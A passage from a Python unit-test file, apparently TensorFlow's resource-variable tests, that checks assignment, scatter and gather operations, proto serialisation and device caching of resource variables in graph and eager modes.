read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(
compat.as_bytes(self.evaluate(read)[0][0]), compat.as_bytes("b"))
# TODO(alive): get this to work in Eager mode.
def testGPU(self):
with test_util.use_gpu():
abc = variable_scope.get_variable(
"abc",
shape=[1],
initializer=init_ops.ones_initializer(),
use_resource=True)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(
self.evaluate(
resource_variable_ops.var_is_initialized_op(abc.handle)),
True)
def testScatterBool(self):
with context.eager_mode():
ref = resource_variable_ops.ResourceVariable(
[False, True, False], trainable=False)
indices = math_ops.range(3)
updates = constant_op.constant([True, True, True])
state_ops.scatter_update(ref, indices, updates)
self.assertAllEqual(ref.read_value(), [True, True, True])
@test_util.run_in_graph_and_eager_modes
def testConstraintArg(self):
constraint = lambda x: x
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var0")
self.assertEqual(v.constraint, constraint)
constraint = 0
with self.assertRaises(ValueError):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var1")
# TODO(alive): how should this work in Eager mode?
@test_util.run_deprecated_v1
def testInitFn(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32)
self.assertEqual(v.handle.op.colocation_groups(),
v.initializer.inputs[1].op.colocation_groups())
def testCountUpTo(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(v.count_up_to(1), 0)
with self.assertRaises(errors.OutOfRangeError):
v.count_up_to(1)
def testCountUpToFunction(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(state_ops.count_up_to(v, 1), 0)
with self.assertRaises(errors.OutOfRangeError):
state_ops.count_up_to(v, 1)
@test_util.run_in_graph_and_eager_modes
def testInitFnDtype(self):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32, name="var0")
self.assertEqual(dtypes.float32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitFnNoDtype(self):
v = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="var2")
self.assertEqual(dtypes.int32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitializeAllVariables(self):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.float32,
name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testOperatorOverload(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(2.0, self.evaluate(v + v))
@test_util.run_in_graph_and_eager_modes
def testAssignMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign(2.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign(3.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign(4.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
def testAssignRuntimeShapeCheck(self):
with forward_compat.forward_compatibility_horizon(2022, 3, 2):
v = resource_variable_ops.ResourceVariable([1.0, 1.0], name="var0")
@def_function.function
def f(shape):
t = array_ops.zeros(shape)
v.assign(t)
with self.assertRaises((errors.InvalidArgumentError, ValueError)):
f(constant_op.constant([3]))
@test_util.run_in_graph_and_eager_modes
def testLoad(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
v.load(2.0)
self.assertEqual(2.0, self.evaluate(v.value()))
def testShapePassedToGradient(self):
with ops.Graph().as_default():
@custom_gradient.custom_gradient
def differentiable_scatter_update(handle, indices, values):
with ops.control_dependencies([
resource_variable_ops.resource_scatter_update(
handle, indices, values)]):
new_handle = array_ops.identity(handle)
def grad(dresult):
self.assertIsNotNone(
tensor_util.constant_value(dresult.dense_shape))
return [dresult, None, None]
return new_handle, grad
var = variable_scope.get_variable(
"foo", shape=[20], initializer=init_ops.zeros_initializer,
dtype=dtypes.float64, use_resource=True)
indices = math_ops.range(10)
updates = math_ops.range(9, -1, -1, dtype=dtypes.float64)
new_handle = differentiable_scatter_update(var.handle, indices, updates)
gathered = resource_variable_ops.resource_gather(
new_handle, indices, dtype=var.dtype)
gradients_impl.gradients([gathered], [updates])
def testToFromProtoCachedValue(self):
with ops.Graph().as_default():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
v_prime = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertIsNone(getattr(v_prime, "_cached_value", None))
other_v_def = resource_variable_ops.ResourceVariable(
caching_device="cpu:0",
initial_value=constant_op.constant(3.0)).to_proto()
other_v_prime = resource_variable_ops.ResourceVariable(
variable_def=other_v_def)
self.assertIsNotNone(other_v_prime._cached_value)
def testVariableDefInitializedInstances(self):
with ops.Graph().as_default(), self.cached_session():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
with ops.Graph().as_default(), self.cached_session():
# v describes a VariableDef-based variable without an initial value.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertEqual(3.0, self.evaluate(v.initialized_value()))
# initialized_value should not rerun the initializer_op if the variable
# has already been initialized elsewhere.
self.evaluate(v.assign(1.0))
self.assertEqual(1.0, v.initialized_value().eval())
v_def.ClearField("initial_value_name")
with ops.Graph().as_default(), self.cached_session():
# Restoring a legacy VariableDef proto that does not have
# initial_value_name set should still work.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
# We should also be able to re-export the variable to a new meta graph.
self.assertProtoEquals(v_def, v.to_proto())
# But attempts to use initialized_value will result in errors.
with self.assertRaises(ValueError):
self.evaluate(v.initialized_value())
def testTrainableInProto(self):
with ops.Graph().as_default():
non_trainable_variable = resource_variable_ops.ResourceVariable(
trainable=False,
initial_value=constant_op.constant(10.0))
self.assertEqual(
False,
resource_variable_ops.ResourceVariable(
variable_def=non_trainable_variable.to_proto())
.trainable)
trainable_variable = resource_variable_ops.ResourceVariable(
trainable=True,
initial_value=constant_op.constant(10.0))
self.assertEqual(
True,
resource_variable_ops.ResourceVariable(
variable_def=trainable_variable.to_proto())
.trainable)
@test_util.run_in_graph_and_eager_modes
def testSparseRead(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value = self.evaluate(v.sparse_read([0, 3, 1, 2]))
self.assertAllEqual(init_value[[0, 3, 1, 2], ...], value)
@test_util.run_in_graph_and_eager_modes
def testGatherNd(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value_op = v.gather_nd([[0, 0], [1, 2], [3, 3]])
self.assertAllEqual([3, 4], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([[0, 1, 2, 3], [24, 25, 26, 27], [60, 61, 62, 63]],
value)
value_op = v.gather_nd([[0, 0, 0], [1, 2, 3], [3, 3, 3]])
self.assertAllEqual([3], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([0, 27, 63], value)
@test_util.run_deprecated_v1
def testToFromProto(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertEqual(2, math_ops.add(w, 1).eval())
self.assertEqual(v._handle, w._handle)
self.assertEqual(v._graph_element, w._graph_element)
@test_util.run_in_graph_and_eager_modes
def testAssignAddMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_add(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_add(1.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_add(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testAssignSubMethod(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_sub(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_sub(1.0, read_value=True)
self.assertEqual(1.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_sub(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(0.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testDestroyResource(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3.0, self.evaluate(v.value()))
self.evaluate(resource_variable_ops.destroy_resource_op(v.handle))
if context.executing_eagerly():
# eager mode creates ref-counting variable handles unaffected by
# DestroyResourceOp.
self.assertEqual(3.0, self.evaluate(v.value()))
else:
with self.assertRaises(errors.FailedPreconditionError):
self.evaluate(v.value())
# Handle to a resource not actually created.
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
# Should raise no exception
self.evaluate(resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=True))
@test_util.run_deprecated_v1
def testAssignDifferentShapes(self):
with self.cached_session() as sess, variable_scope.variable_scope(
"foo", use_resource=True):
var = variable_scope.get_variable("x", shape=[1, 1], dtype=dtypes.float32)
placeholder = array_ops.placeholder(dtypes.float32)
assign = var.assign(placeholder)
sess.run(
[assign],
feed_dict={placeholder: np.zeros(shape=[2, 2], dtype=np.float32)})
def testAssignDifferentShapesEagerNotAllowed(self):
with context.eager_mode():
with variable_scope.variable_scope("foo"):
var = variable_scope.get_variable("x", shape=[1, 1],
dtype=dtypes.float32)
with self.assertRaisesRegex(ValueError,
"shape.*and.*are incompatible"):
assign = var.assign(np.zeros(shape=[2, 2]))
self.evaluate(assign)
@test_util.disable_xla("XLA doesn't allow changing shape at assignment, as "
"dictated by tf2xla/xla_resource.cc:SetTypeAndShape")
@test_util.run_in_graph_and_eager_modes
def testAssignDifferentShapesAllowed(self):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[1, 1]),
shape=tensor_shape.TensorShape(None))
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(np.zeros(shape=[1, 1]), var.read_value())
self.evaluate(var.assign(np.zeros(shape=[2, 2])))
self.assertAllEqual(np.zeros(shape=[2, 2]), var.read_value())
@test_util.run_in_graph_and_eager_modes
def testAssignReturnsVariable(self):
var = resource_variable_ops.ResourceVariable(1.)
self.evaluate(variables.global_variables_initializer())
assigned = var.assign(2.)
self.assertIsInstance(assigned, resource_variable_ops.BaseResourceVariable)
assigned = assigned.assign(3.)
self.assertEqual(self.evaluate(assigned), 3.)
self.assertEqual(self.evaluate(var), 3.)
self.assertEqual(self.evaluate(var.assign_add(1.).assign_add(1.)), 5)
self.assertEqual(self.evaluate(var.assign_sub(1.).assign_sub(1.)), 3)
var = resource_variable_ops.ResourceVariable([1., 2.])
self.evaluate(variables.global_variables_initializer())
slices = indexed_slices.IndexedSlices(indices=[1], values=[2])
def assert_eq(tensor, vals):
self.assertAllEqual(self.evaluate(tensor), vals)
assert_eq(var.scatter_add(slices).scatter_add(slices), [1., 6.])
assert_eq(var.scatter_sub(slices).scatter_sub(slices), [1., 2.])
slices2 = indexed_slices.IndexedSlices(indices=[0], values=[3])
assert_eq(var.scatter_max(slices2).scatter_add(slices), [3., 4.])
assert_eq(var.scatter_add(slices).scatter_min(slices), [3., 2.])
assert_eq(var.scatter_mul(slices).scatter_mul(slices), [3., 8.])
assert_eq(var.scatter_div(slices).scatter_div(slices), [3., 2.])
assert_eq(
var.scatter_nd_update([[1]], [4.]).scatter_nd_add([[0]], [2.])
.scatter_nd_sub([[1]], [3]),
[5., 1.])
assert_eq(var, [5., 1.])
batch_var = resource_variable_ops.ResourceVariable(array_ops.ones((2, 2)))
self.evaluate(variables.global_variables_initializer())
batch_slices1 = indexed_slices.IndexedSlices(
indices=[[1], [0]], values=[[2], [2]])
batch_slices2 = indexed_slices.IndexedSlices(
indices=[[1], [1]], values=[[3], [3]])
assert_eq(
batch_var.batch_scatter_update(batch_slices1)
.batch_scatter_update(batch_slices2),
[[1, 3], [2, 3]])
@test_util.run_in_graph_and_eager_modes
def testInitValueWrongShape(self):
with self.assertRaisesWithPredicateMatch(
ValueError, r"not compatible with"):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[3]),
shape=[4])
self.evaluate(variables.global_variables_initializer())
self.evaluate(var.read_value())
@test_util.run_deprecated_v1
def testDtypeAfterFromProto(self):
v = resource_variable_ops.ResourceVariable(2.0)
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertIsInstance(w.dtype, dtypes.DType)
self.assertEqual(v.dtype, w.dtype)
# TODO(alive): get caching to work in eager mode.
@test_util.run_deprecated_v1
def testCachingDevice(self):
with ops.device("/job:server/task:1"):
v = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", v.value().device)
with self.assertRaises(ValueError):
_ = v.value().op.get_attr("_class")
with ops.colocate_with(v.op):
w = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", w.value().device)
with self.assertRaises(ValueError):
_ = w.value().op.get_attr("_class")
@test_util.run_deprecated_v1
def testSharedName(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(300.0, name="var4")
self.evaluate(variables.global_variables_initializer())
w = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="var4",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
x = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="var5",
container=ops.get_default_graph()._container)
with self.assertRaisesOpError(
"(Resource .*/var5/.* does not exist|uninitialized)"):
resource_variable_ops.read_variable_op(x, v.dtype.base_dtype).eval()
@test_util.run_deprecated_v1
def testSharedNameWithNamescope(self):
with self.cached_session():
with ops.name_scope("foo"):
v = resource_variable_ops.ResourceVariable(300.0, name="var6")
self.assertEqual("foo/var6", v._shared_name) # pylint: disable=protected-access
self.assertEqual("foo/var6:0", v.name)
self.evaluate(variables.global_variables_initializer())
w = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="foo/var6",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
@test_util.run_in_graph_and_eager_modes
def testShape(self):
v = resource_variable_ops.ResourceVariable(
name="var4", initial_value=array_ops.ones(shape=[10, 20, 35]))
self.assertEqual("(10, 20, 35)", str(v.shape))
self.assertEqual("(10, 20, 35)", str(v.get_shape()))
self.assertEqual("(10, 20, 35)", str(v.value().shape))
self.assertEqual("(3, 20, 35)", str(v.sparse_read([0, 1, 2]).shape))
if not context.executing_eagerly():
self.assertEqual(
"<unknown>",
str(v.sparse_read(array_ops.placeholder(dtypes.int32)).shape))
@test_util.run_deprecated_v1
def testSetInitialValue(self):
with self.cached_session():
# Initialize variable with a value different from the initial value passed
# in the constructor.
v = resource_variable_ops.ResourceVariable(2.0)
v.initializer.run(feed_dict={v.initial_value: 3.0})
self.assertEqual(3.0, v.value().eval())
@test_util.run_v1_only("b/120545219")
def testControlFlowInitialization(self):
"""Expects an error if an initializer is in a control-flow scope."""
def cond(i, _):
return i < 10
def body(i, _):
zero = array_ops.zeros([], dtype=dtypes.int32)
v = resource_variable_ops.ResourceVariable(initial_value=zero)
return (i + 1, v.read_value())
with self.assertRaisesRegex(ValueError, "initial_value"):
control_flow_ops.while_loop(cond, body, [0, 0])
def testVariableEager(self):
with context.eager_mode():
init = array_ops.ones(shape=[10, 20, 35], dtype=dtypes.int32)
constraint = lambda x: x
with ops.name_scope("foo", skip_on_eager=False):
v = resource_variable_ops.ResourceVariable(
name="var7",
initial_value=init,
caching_device="cpu:0",
constraint=constraint)
# Test properties
self.assertEqual(dtypes.int32, v.dtype)
self.assertEqual("foo/var7:0", v.name)
self.assertAllEqual([10, 20, 35], v.shape.as_list())
self.assertIsInstance(v.handle, ops.EagerTensor)
self.assertEqual(constraint, v.constraint)
self.assertAllEqual(init.numpy(), v.read_value().numpy())
self.assertAllEqual(init.numpy(), v.value().numpy())
# Callable init.
callable_init = lambda: init * 2
v2 = resource_variable_ops.ResourceVariable(
initial_value=callable_init, name="var7")
self.assertEqual("var7:0", v2.name)
self.assertAllEqual(2 * init.numpy(), v2.read_value().numpy())
# Test assign_add.
new_v2_val = v2.assign_add(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 3, new_v2_val.numpy())
# Test assign_sub.
new_v2_val = v2.assign_sub(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 2, new_v2_val.numpy())
# Test assign.
v2.assign(v.read_value())
self.assertAllEqual(v.read_value().numpy(), v2.read_value().numpy())
# Test load
v2.load(2 * v.read_value())
self.assertAllEqual(2 * v.read_value().numpy(), v2.read_value().numpy())
# Test convert_to_tensor
t = ops.convert_to_tensor(v)
self.assertAllEqual(t.numpy(), v.read_value().numpy())
# Test operations
self.assertAllEqual((v * 2).numpy(), (v + v).numpy())
def testNumpyDotArray(self):
with context.eager_mode():
# Scalars use a separate code path.
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="v1")
self.assertEqual(1, np.array(v1))
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: [1, 2],
name="v2")
self.assertAllEqual(v2.read_value().numpy(), np.array(v2))
self.assertAllEqual([1, 2], np.array(v2))
def testContainerEager(self):
with context.eager_mode():
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="same")
with ops.container("different"):
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: 0,
name="same")
v2.assign(2)
self.assertEqual(1, v1.read_value().numpy())
self.assertEqual(2, v2.read_value().numpy())
def testDestruction(self):
with context.eager_mode():
var = resource_variable_ops.ResourceVariable(initial_value=1.0,
name="var8")
var_handle = test_ops.make_weak_resource_handle(var._handle)
del var
with self.assertRaisesRegex(errors.NotFoundError,
r"Resource .* does not exist."):
resource_variable_ops.destroy_resource_op(var_handle,
ignore_lookup_error=False)
def testScatterUpdate(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3.0])
self.assertAllEqual([1.0, 3.0], v.numpy())
def testScatterAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="add")
state_ops.scatter_add(v, [1], [3])
self.assertAllEqual([1.0, 5.0], v.numpy())
def testScatterSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="sub")
state_ops.scatter_sub(v, [1], [3])
self.assertAllEqual([1.0, -1.0], v.numpy())
def testScatterUpdateVariant(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([
list_ops.empty_tensor_list(
element_dtype=dtypes.float32, element_shape=[])
])
v.scatter_update(
indexed_slices.IndexedSlices(
list_ops.tensor_list_from_tensor([1., 2.], element_shape=[]), 0))
self.assertAllEqual(
list_ops.tensor_list_get_item(v[0], 0, element_dtype=dtypes.float32),
1.)
def testGroupDoesntForceRead(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
assign = v.assign_add(1.0)
g = control_flow_ops.group([assign])
self.assertEqual(g.control_inputs[0].type, "AssignAddVariableOp")
def testScatterNdAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="add")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, 13, 3, 14, 14, 6, 7, 20])
state_ops.scatter_nd_add(v, indices, updates)
self.assertAllClose(expected, v.numpy())
@test_util.run_in_graph_and_eager_modes
def testUnreadVariableInsideFunction(self):
v = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def assign():
v.assign(1.0)
graph = assign.get_concrete_function().graph
self.assertTrue(all(x.type != "ReadVariableOp"
for x in graph.get_operations()))
def testScatterNdSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="sub")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, -9, 3, -6, -4, 6, 7, -4])
state_ops.scatter_nd_sub(v, indices, updates)
self.assertAllClose(expected, v.numpy())
def testScatterUpdateCast(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3])
self.assertAllEqual([1.0, 3.0], v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateInvalidArgs(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3], name="update")
# The exact error and message differ between graph construction (where the
# error is realized during shape inference at graph construction time),
# eager execution (where the error is realized during kernel execution),
# and XLA auto-clustering execution (where the error is realized in the xla
# op kernel) which is triggered when running in eager op as function mode.
with self.assertRaisesRegex(Exception, r"shape.*2.*3|RET_CHECK failure"):
state_ops.scatter_update(v, [0, 1], [0, 1, 2])
@test_util.disable_xla("b/208334252") # XLA doesn't have a deterministic impl
def testScatterAddDeterministic(self):
with context.eager_mode(), test_util.deterministic_ops():
# Normally a nondeterministic codepath occurs when the variable has at
# least 1024 elements. Test that op determinism ensures the op is
# deterministc.
v = resource_variable_ops.ResourceVariable(array_ops.zeros([1024]))
delta = ops.IndexedSlices(
values=np.random.normal(size=(1_000_000,)),
indices=array_ops.zeros((1_000_000,), dtype=np.int32),
dense_shape=(1024,))
v.scatter_add(delta)
for _ in range(5):
v2 = resource_variable_ops.ResourceVariable(array_ops.zeros([1024]))
v2.scatter_add(delta)
self.assertAllEqual(v, v2)
@test_util.run_in_graph_and_eager_modes
def testAssignIncompatibleShape(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
self.evaluate(v.initializer)
pattern = re.compile("shapes must be equal", re.IGNORECASE)
with self.assertRaisesRegex(Exception, pattern):
self.evaluate(v.assign_add(1))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testCopyToGraphUninitialized(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
copy_to_graph = ops.Graph()
with copy_to_graph.as_default(): # Intentionally testing v1 behavior
copied = resource_variable_ops.copy_to_graph_uninitialized(v)
self.assertEqual(v.name, copied.name)
self.assertIsNone(copied.initializer)
def create_variant_shape_and_type_data(self):
variant_shape_and_type_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData())
variant_shape_and_type_data.is_set = True
stored_shape = tensor_shape.TensorShape([None, 4]).as_proto()
stored_dtype = dtypes.float32.as_datatype_enum
# NOTE(ebrevdo): shape_and_type lacks append() in some versions of protobuf.
variant_shape_and_type_data.shape_and_type.extend([
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=stored_shape,
dtype=stored_dtype,
type=full_type_pb2.FullTypeDef())
])
return variant_shape_and_type_data
@def_function.function
def create_constant_variant(self, value):
value = constant_op.constant(
tensor_pb2.TensorProto(
dtype=dtypes.variant.as_datatype_enum,
tensor_shape=tensor_shape.TensorShape([]).as_proto(),
variant_val=[
tensor_pb2.VariantTensorDataProto(
# Match registration in variant_op_registry.cc
type_name=b"int",
metadata=np.array(value, dtype=np.int32).tobytes())
]))
return value
# TODO(ebrevdo): Add run_in_graph_and_eager_modes once we can create
# EagerTensor constants with TensorProto inputs.
@test_util.disable_tfrt("Does not support tf.Const in lowering.")
@test_util.run_in_graph_and_eager_modes()
def testVariantInitializer(self):
variant_shape_and_type_data = self.create_variant_shape_and_type_data()
value = self.create_constant_variant(3)
initializer = array_ops.fill([3], value)
resource_variable_ops._set_handle_shapes_and_types( # pylint: disable=protected-access
initializer, variant_shape_and_type_data,
graph_mode=not context.executing_eagerly())
v = resource_variable_ops.ResourceVariable(initializer)
read = array_ops.identity(v)
read_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(read))
self.assertEqual(
read_variant_shape_and_type, variant_shape_and_type_data)
gather = v.sparse_read([0])
gather_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(gather))
self.assertEqual(
gather_variant_shape_and_type, variant_shape_and_type_data)
# Make sure initializer runs.
if not context.executing_eagerly():
self.evaluate(v.initializer)
self.evaluate(read.op)
self.evaluate(gather.op)
@parameterized.parameters([
# batch_dims=0 (equivalent to tf.gather)
dict( # 2D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[2, 1], [0, 3]],
expected=[[8, 7], [6, 9]]),
dict( # 3D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
dict( # 4D indices
batch_dims=0,
params=[8, 9],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
# batch_dims=indices.shape.ndims - 1 (equivalent to
# tf.compat.v1.batch_gather)
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
# 0 < batch_dims < indices.shape.ndims - 1
dict( # 3D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
dict( # 4D indices (1 batch dim)
batch_dims=1,
params=[[6, 7], [8, 9]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
dict( # 4D indices (2 batch dims)
batch_dims=2,
params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
[[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDims(self, params, indices, batch_dims, expected):
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=0,
output_shape=[2, 3, 8, 9, 10, 3, 4, 5, 6, 7]
# = indices.shape + params.shape[1:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=1,
output_shape=[2, 3, 8, 9, 10, 4, 5, 6, 7]
# = params.shape[:1] + indices.shape[1:] + params.shape[2:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 9, 10],
batch_dims=3,
output_shape=[2, 3, 4, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[3:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 5, 10],
